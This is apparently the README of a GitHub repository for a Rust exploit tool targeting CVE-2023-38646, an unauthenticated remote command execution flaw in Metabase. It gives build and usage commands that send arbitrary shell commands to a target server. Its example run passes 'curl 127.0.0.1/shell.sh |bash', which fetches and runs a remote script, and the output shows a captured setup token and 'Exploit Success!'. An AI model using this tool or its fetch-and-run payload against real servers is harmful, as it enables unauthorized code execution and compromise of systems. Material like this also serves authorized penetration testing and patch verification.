CVE-2023-38646

Overview
Compile
Usage
Running CVE-2023-38646

Overview

Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources. This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication

Compile

First perform the compilation with the command:

cargo build --release

Usage

You can do it in these two ways:

cargo run -- --url http://localhost --command "curl <ip>"

.\target\release\cve_2023_38646 --url http://localhost --command "curl <ip>"

This will display help for the tool. Here are all the switches it supports:

CVE-2023-38646

Usage: cve_2023_38646 --url <URL> --command <COMMAND>

Options:
  -u, --url <URL>          Insert URL
  -c, --command <COMMAND>  Insert command
  -h, --help               Print help

Running CVE-2023-38646

cargo run -- --url http://example.com --command "curl 127.0.0.1/shell.sh |bash"

[+] Token: 7cdac991-5fbd-4c3c-b6a7-0c80b3f66abc
[+] Exploit Success!

joaoviictorti / CVE-2023-38646

CVE-2023-38646

Overview

Compile

Usage

Running CVE-2023-38646

About

Languages